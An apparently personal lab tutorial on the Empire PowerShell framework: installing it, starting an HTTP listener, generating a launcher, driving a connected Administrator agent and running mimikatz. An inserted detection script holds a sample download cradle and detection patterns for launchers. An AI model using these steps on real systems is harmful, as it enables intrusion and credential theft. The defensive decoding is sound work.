Introduction to Empire, a PowerShell tool


Efficiency and luck really are a thing

I could have had this working last night, but instead I sat staring blankly at a few online articles. As for luck: it took me half a day to realize that, in my own tests, the HTTP listener port has to be 80. When I set a different port, say 8100, Empire's list command still showed port 80, while a local check showed 8100 in the listening state.

1. Installation
2. Basic local reverse shell usage
3. Macro reverse shell usage (not tested locally)
4. Using msf and Empire together (not tested locally)

References:

https://blog.csdn.net/weixin_33688840/article/details/94275885 ***
https://cloud.tencent.com/developer/article/1097791
http://www.myh0st.cn/index.php/archives/193/
https://www.anquanke.com/post/id/87328
https://xz.aliyun.com/t/67

https://klionsec.github.io/2016/10/06/empire-powershell/ includes an introduction to some of the ps1 scripts
https://zhuanlan.zhihu.com/p/26937026 worked example
https://www.freebuf.com/articles/web/165925.html detailed explanation
https://xz.aliyun.com/t/4159
https://www.jianshu.com/p/c5153ee1eb76
https://www.chainnews.com/articles/379463175693.htm

1. Installation

git clone https://github.com/EmpireProject/Empire.git
cd Empire/setup
./install.sh
./reset.sh to (re)initialize (if something goes wrong, just run it again and restart)
Run: ./empire
You can see that it consists of three parts:
modules, Empire's own built-in modules
listeners, which wait for connections, similar to msf's exploit/multi/handler module
agents, the sessions that have already connected back, similar to the sessions msf stores

2. Basic local reverse shell usage

(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name test
(Empire: listeners/http) > set Host http://192.168.132.131
(Empire: listeners/http) > set Port 8000
(Empire: listeners/http) > execute
[*] Starting listener 'test'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > back
(Empire: listeners) > launcher powershell test

(Empire: listeners) > agents

[*] Active agents:

Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
ZRYKX53T ps 192.168.132.129 ROOT-PC *root-PC\Administrator powershell 1532 5/0.0 2019-09-01 12:30:16

(Empire: agents) > re
remove rename resource
(Empire: agents) > rename ZRYKX53T test128
(Empire: agents) > interact test128
(Empire: test128) >
agents download jobs lostlimit rename scriptimport spawn upload
back exit kill main resource searchmodule steal_token usemodule
bypassuac help killdate mimikatz revtoself shell sysinfo workinghours
clear info list psinject sc shinject updatecomms
creds injectshellcode listeners pth scriptcmd sleep updateprofile
(Empire: test128) > mimikatz    (this step waits roughly ten seconds before any result appears)
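From the defender's side, the artifact produced by the `launcher powershell test` step above is a PowerShell process creation whose command line carries an encoded payload. The following Python is an added example, not code from this post or from the Empire project: it assumes the launcher shape `powershell -noP -sta -w 1 -enc <base64>` (typical of Empire's default PowerShell launcher, but not shown on this page), decodes the `-EncodedCommand` argument (base64 over UTF-16LE) and scores command lines from constructed Sysmon-style log lines; the inner script and log lines are constructed samples.

```python
import base64
import re
# Constructed (not from the page): an inner script of the kind a launcher carries,
# encoded as -EncodedCommand expects (base64 over UTF-16LE). Nothing is executed.
INNER_SCRIPT = "$u='http://192.168.132.131:8000/';(New-Object Net.WebClient).DownloadString($u)"
ENCODED = base64.b64encode(INNER_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed Sysmon-style (Event ID 1) process-creation lines.
SAMPLE_LOGS = [
    "Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe C:\\notes.txt",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -noP -sta -w 1 -enc " + ENCODED,
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -File C:\\scripts\\backup.ps1",
]
ENC_RE = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
# (label, pattern) traits; a benign admin script rarely shows several at once.
TRAITS = [("no-profile", r"-nop(?:rofile)?\b"), ("sta", r"-sta\b"),
          ("hidden-window", r"-w(?:indowstyle)?\s+(?:1|hidden)\b")]

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def launcher_indicators(cmdline):
    """Collect traits typical of an Empire-style PowerShell launcher in one command line."""
    if "powershell" not in cmdline.lower():
        return []
    hits = [label for label, pat in TRAITS if re.search(pat, cmdline, re.I)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded-command")
        if re.search(r"webclient|downloadstring|invoke-expression|\biex\b", decoded, re.I):
            hits.append("download-cradle")
    return hits

def find_suspicious(lines, threshold=3):
    # Return (line, indicators, decoded payload) for lines showing >= threshold traits.
    found = []
    for line in lines:
        cmd = line.split("CommandLine=", 1)[-1]
        hits = launcher_indicators(cmd)
        if len(hits) >= threshold:
            found.append((line, hits, decode_encoded_command(cmd)))
    return found
```

Feeding the decoded payload back into the alert is what lets an analyst see the listener host and port without re-running the command.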

3. Macro reverse shell usage (not tested locally)

(Empire: listeners) > usestager windows/macro


4. Using msf and Empire together (not tested locally)

2019.9.1
